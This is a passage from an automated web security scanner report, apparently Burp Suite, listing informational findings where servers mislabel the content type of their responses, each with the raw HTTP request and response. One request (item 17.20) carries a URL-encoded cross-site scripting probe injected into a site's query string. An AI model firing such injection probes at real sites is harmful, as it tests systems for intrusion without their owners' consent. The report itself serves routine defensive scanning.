Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Cache-Control: max-age=86313600
Date: Mon, 12 Sep 2011 12:48:08 GMT
Content-Length: 15
Connection: close
Vary: Accept-Encoding

File not found.
17.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2685991&PluID=0&w=336&h=150&ord=1837674&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/p%3B241151714%3B0-0%3B0%3B42089989%3B18754-336/150%3B42232212/42249999/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 12 Sep 2011 12:48:05 GMT
Connection: close
Content-Length: 2070

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
17.10. http://class.savannahnow.com/classifieds-bin/classifieds  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://class.savannahnow.com
Path:   /classifieds-bin/classifieds

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /classifieds-bin/classifieds?tp=mdTopAds2.0+Core&category=core&temp_type=browse&prop=savannah%20topads&class=Real%20Estate%20for%20Sale&targetdiv=wl-top-2&perPage=3&showViewAll=True&highlightMax=&maxChars=50 HTTP/1.1
Host: class.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 12 Sep 2011 12:32:50 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: Last-Modified: Mon, 12 Sep 2011 12:32:00 GMT
Cache-Control: Expires: Mon, 12 Sep 2011 12:42:00 GMT
Content-Length: 527
Age: 928
X-Cache: HIT from classapp2.morris.com
X-Cache-Lookup: HIT from classapp2.morris.com:3128
Connection: keep-alive


var target = document.getElementById('wl-top-2');


       target.innerHTML = " ";
       target.innerHTML='No Ads Found<div id="mdw_viewall"><a href="http://class.savannahnow.com/classifieds-bin/classi
...[SNIP]...
17.11. http://drupal.org/misc/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://drupal.org
Path:   /misc/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /misc/favicon.ico HTTP/1.1
Host: drupal.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; __utma=267740763.847546434.1315849637.1315849637.1315849637.1; __utmb=267740763.2.10.1315849637; __utmc=267740763; __utmz=267740763.1315849637.1.1.utmcsr=ciphertex.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/contact; __utmv=267740763.anonymous%20user

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 18 Feb 2009 20:49:42 GMT
Cache-Control: max-age=1209600
Expires: Mon, 26 Sep 2011 12:44:30 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Content-Length: 5430
Date: Mon, 12 Sep 2011 12:47:02 GMT
X-Varnish: 550018730 550007800
Age: 153
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: www6.drupal.org
X-Cache: HIT
X-Cache-Hits: 69

............ .h...&... .... .........(....... ..... .........................................}N...W.z.X...W...l!..y6..^...R.".............................W.G.V...Y...Y....[...{...P...u..|6..U.z......
...[SNIP]...
17.12. http://go.savannahnow.com/partner_json/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:11 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: fresh
X-HTTP_CLIENT_IP_O: 108.39.3.168
ETag: "86c64c0eefa9ee193ae95b138e3b013d"
X-Runtime: 157
Access-Control-Allow-Origin: *
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: 274544672133f3873d83689b5066ec621d4e5366
Cache-Control: max-age=1800, public
Z-REQUEST-HANDLED-BY: www12
Age: 1089
Content-Length: 2841

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Darius Rucker","has_tickets":true,"tickets_on_sale":null,"venue_id":854691,"id":172970805,"starttime":"Fri Sep 16 19:00:00 UTC 2011"
...[SNIP]...
17.13. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831718_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:38 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 554

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...
17.14. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/geoload.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://intl.esperanto.mtvi.com
Path:   /sitewide/scripts/widgets/geo/geoload.jhtml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /sitewide/scripts/widgets/geo/geoload.jhtml?load=advisory&profile=mtv_co_uk HTTP/1.1
Host: intl.esperanto.mtvi.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html;charset=UTF-8
ETag: 275c2131eb4e1b98c2a8cae0743c81
Vary: Accept-Encoding
Cache-Control: max-age=21351
Date: Mon, 12 Sep 2011 12:48:44 GMT
Content-Length: 5044
Connection: close

try {
if (!mtvni) var mtvni = {};
if (!mtvni.geo) {
mtvni.geo = {};
mtvni.geo.init = {};
mtvni.geo.info = { profile: {}, imagefolder: "/gsp", verno: "2.5", initLoaded: false }
try {
mtvni.geo.info.scr
...[SNIP]...
17.15. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/json/advisory.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://intl.esperanto.mtvi.com
Path:   /sitewide/scripts/widgets/geo/json/advisory.jhtml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /sitewide/scripts/widgets/geo/json/advisory.jhtml?profile=mtv_co_uk&geocode=us&verno=2.5 HTTP/1.1
Host: intl.esperanto.mtvi.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: e8546aea70703484da532a8b7ea03740
Last-Modified: Mon, 12 Sep 2011 12:42:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1070
Cache-Control: max-age=21513
Date: Mon, 12 Sep 2011 12:49:58 GMT
Connection: close
Vary: Accept-Encoding

mtvni.geo.info.advisoryjson = {
width:'768',
height:'450',
imgpath: 'http://intl.esperanto.mtvi.com',
geo: 'us',
profile: 'mtv_co_uk',
json: { geomanagementprofile:{ title:'Continue to visit MTV UK',    
...[SNIP]...
17.16. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/json/persistent.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://intl.esperanto.mtvi.com
Path:   /sitewide/scripts/widgets/geo/json/persistent.jhtml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /sitewide/scripts/widgets/geo/json/persistent.jhtml?profile=mtv_co_uk_persistent&geocode=us&verno=2.5 HTTP/1.1
Host: intl.esperanto.mtvi.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 6b27bef8fecbad8578708298af758d1d
Last-Modified: Mon, 12 Sep 2011 12:46:56 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 871
Cache-Control: max-age=21471
Date: Mon, 12 Sep 2011 12:49:57 GMT
Connection: close
Vary: Accept-Encoding

mtvni.geo.info.persistentjson = {
width:'768',
height:'450',
imgpath: 'http://intl.esperanto.mtvi.com',
geo: 'us',
profile: 'mtv_co_uk_persistent',
json: { geomanagementprofile:{ title:'Continue to vi
...[SNIP]...
17.17. http://metrics.impactengine.com/rest/reveal/129534/5011/Expand_Content  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://metrics.impactengine.com
Path:   /rest/reveal/129534/5011/Expand_Content

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /rest/reveal/129534/5011/Expand_Content?invalidate=1315849766118 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:17 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 63
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><reveal>    <success id='129534' /></reveal></rsp>
17.18. http://metrics.impactengine.com/rest/view/129534/5011/0  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://metrics.impactengine.com
Path:   /rest/view/129534/5011/0

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /rest/view/129534/5011/0?invalidate=1315849757167 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:02 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 69
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><mouse_over>    <success id='129534' /></mouse_over</rsp>
17.19. http://metrics.impactengine.com/rest/view/129534/5011/30  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://metrics.impactengine.com
Path:   /rest/view/129534/5011/30

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /rest/view/129534/5011/30?invalidate=1315849817169 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:06:38 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 69
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><mouse_over>    <success id='129534' /></mouse_over</rsp>
17.20. http://p.raasnet.com/partners/dfp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://p.raasnet.com
Path:   /partners/dfp

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /partners/dfp?partner=40046&ord=0.5825194382847674 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Content-Type: text/javascript
Content-Length: 21
Date: Mon, 12 Sep 2011 13:05:33 GMT
Connection: close

rasegs='rasegs=seg2';
17.21. http://pglb.buzzfed.com/148250/91bc34b96eac101805574950b6644cc6  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pglb.buzzfed.com
Path:   /148250/91bc34b96eac101805574950b6644cc6

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /148250/91bc34b96eac101805574950b6644cc6?callback=BF_PARTNER.gate_response&cb=1793 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 38
Cache-Control: max-age=604755
Expires: Mon, 19 Sep 2011 12:47:13 GMT
Date: Mon, 12 Sep 2011 12:47:58 GMT
Connection: close

BF_PARTNER.gate_response(1304470645);
17.22. http://ps2.newsinc.com/Playlist/show/10557/4106/994.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ps2.newsinc.com
Path:   /Playlist/show/10557/4106/994.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /Playlist/show/10557/4106/994.xml HTTP/1.1
Host: ps2.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 12 Sep 2011 12:49:50 GMT
Expires: -1
NDN-Server: PS05
NDN-SiteVer: 3.2.1
Pragma: no-cache
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 2.0
X-Powered-By: ASP.NET
Content-Length: 4598
Connection: keep-alive


<?xml version="1.0" encoding="UTF-8"?>
<ServiceResponse xmlns="http://permissiontv.com/v2.2/ptvml">
   <Status>200</Status>
   <Message>Success.</Message>
   
<Playlist>
<ID>994</ID>
<Nam
...[SNIP]...
17.23. http://s0.2mdn.net/2251996/Pixel_1x1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s0.2mdn.net
Path:   /2251996/Pixel_1x1.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /2251996/Pixel_1x1.jpg HTTP/1.1
Host: s0.2mdn.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Tue, 07 Apr 2009 10:56:12 GMT
Date: Mon, 12 Sep 2011 12:48:58 GMT
Expires: Tue, 13 Sep 2011 12:48:58 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
17.24. http://www.cargoh.com/sites/all/themes/cargoh/images/icons/fav_mail.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cargoh.com
Path:   /sites/all/themes/cargoh/images/icons/fav_mail.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /sites/all/themes/cargoh/images/icons/fav_mail.gif HTTP/1.1
Host: www.cargoh.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 06 Apr 2011 20:21:49 GMT
ETag: "12a8219-539-4a045be13d140"
Cache-Control: max-age=1209600
Expires: Mon, 26 Sep 2011 10:58:49 GMT
Content-Type: image/gif
Content-Length: 1337
Date: Mon, 12 Sep 2011 12:48:40 GMT
X-Varnish: 1072006045 1071999776
Age: 6591
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT

.PNG
.
...IHDR.......^......}......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..XMH.Z.>qR.Cg.Z..).......B..K.n..E......E...J..>.BA....A7]..K....3<..*...m.K.0In2...
s d2...w~...Q.c....4.*...........5.
...[SNIP]...
17.25. http://www.mtv.co.uk/files/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mtv.co.uk
Path:   /files/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /files/favicon.ico HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 28 Jun 2011 10:27:55 GMT
ETag: "2373e-57e-1ef440c0"
Accept-Ranges: bytes
Content-Length: 1406
Debug: lnioxp005wuk
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=593156
Expires: Mon, 19 Sep 2011 09:36:34 GMT
Date: Mon, 12 Sep 2011 12:50:38 GMT
Connection: close

..............h.......(....... ...................................................eee.................rrr.........666.........            .........nnn.........................000.........................;;;...
...[SNIP]...
17.26. http://www.onsugar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.onsugar.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web018-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Content-type: image/gif
Date: Mon, 12 Sep 2011 13:03:09 GMT
Server: lighttpd/1.4.26
Content-Length: 634

.PNG
.
...IHDR................a...    pHYs................ cHRM..m...s....N......n....=..3............IDATx.\..jTA......g....$DP...c.Gp..("..E.....hV......{.FQ\$ ...f....]..1X...U..U_...6.+t~...".....
...[SNIP]...
17.27. http://www.pdx.edu/sites/all/themes/pdx_home/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pdx.edu
Path:   /sites/all/themes/pdx_home/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/all/themes/pdx_home/favicon.ico HTTP/1.1
Host: www.pdx.edu
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; __utma=237067329.1743793829.1315849744.1315849744.1315849744.1; __utmb=237067329.1.10.1315849744; __utmc=237067329; __utmz=237067329.1315849744.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 04 Aug 2011 15:19:09 GMT
ETag: "2e9e8-47e-4a9af809d3540"
Cache-Control: max-age=1209600
Expires: Thu, 22 Sep 2011 03:57:42 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 1150
Date: Mon, 12 Sep 2011 12:50:05 GMT
X-Varnish: 2032713920 2028186911
Age: 377543
Via: 1.1 varnish
Connection: keep-alive
X-backend: castor

